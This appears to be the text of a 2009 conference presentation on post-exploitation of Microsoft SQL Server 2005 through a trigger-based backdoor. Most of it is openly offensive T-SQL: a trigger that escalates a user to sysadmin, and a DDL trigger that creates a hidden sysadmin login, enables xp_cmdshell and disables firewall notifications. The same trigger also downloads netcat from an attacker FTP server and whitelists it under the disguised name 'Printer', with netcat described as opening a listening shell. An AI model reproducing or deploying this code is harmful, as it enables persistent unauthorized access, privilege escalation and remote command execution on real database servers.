MSSql server 2005 backdoor
Duong Ngo October 14, 2009
POST-EXPLOITATION
Got access to a MSSQL box? (SQL injection, brute force…)
Privileges: sa / dbo / normal user
Got all data
Now what’s next??
Backdoors
Provide easier access to the compromised box in the future
Types of backdoors: OS backdoors (rootkits), web server backdoors (PHPshell, CGITelnet..)
So how about a database backdoor? YES!
SQL Server 2005 Backdoor
We’ll create a backdoor based on a SQL Server trigger.
What’s a trigger?
Database Trigger
Special kind of stored procedure that executes automatically when a user attempts the specified data-modification statement on the specified table (UPDATE, DELETE, INSERT..)
A trigger executes under the security context of whoever caused it to fire!
EXAMPLE – Create trigger
Context: Normal User with Create Trigger permission:
CREATE TRIGGER trg_gain_privilege ON tblCustomers FOR INSERT, DELETE, UPDATE
AS
EXEC sp_addsrvrolemember @loginame = 'Hacker', @rolename = N'sysadmin'
EXAMPLE – Trigger got fired
Context: sa (server admin)
sa> DELETE FROM tblCustomers
RESULT: User “Hacker” is now a sysadmin
What can we do with that?
Privilege escalation: normal user -> higher role
Database backdoor
SQLServer Backdoor features:
- Execute subsequent commands if current user is 'sa'
- Enable xp_cmdshell
- Create new login 'backdoor' and add it to sysadmin server role.
- Disable firewall notification mode
- Add ftp to allowed programs list
- Get netcat from attacker ftp server
- Create a directory 'Backdoor_activated' in attacker ftp server to let the attacker know whenever the backdoor has been started.
- Open netcat in listen mode attached with sql command line client Osql.
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#';
EXEC sys.sp_addsrvrolemember @loginame = N'Backdoor', @rolename = N'sysadmin'
-- disable firewall notification mode
EXEC master..xp_cmdshell 'netsh firewall set notifications disable'
…..
Why DDL_DATABASE_LEVEL_EVENTS?
Because it consists of all the events below:
CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW ALTER_VIEW DROP_VIEW
CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION ALTER_FUNCTION DROP_FUNCTION
CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE CREATE_TRIGGER ALTER_TRIGGER
DROP_TRIGGER CREATE_EVENT_NOTIFICATION DROP_EVENT_NOTIFICATION
….….
Our Backdoor’s Code (cont)
-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- After getting netcat, add netcat to the firewall’s allowed program list
SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\' + @fileget + ' name=Printer mode=ENABLE scope=ALL profile=ALL'
Thank You for listening!!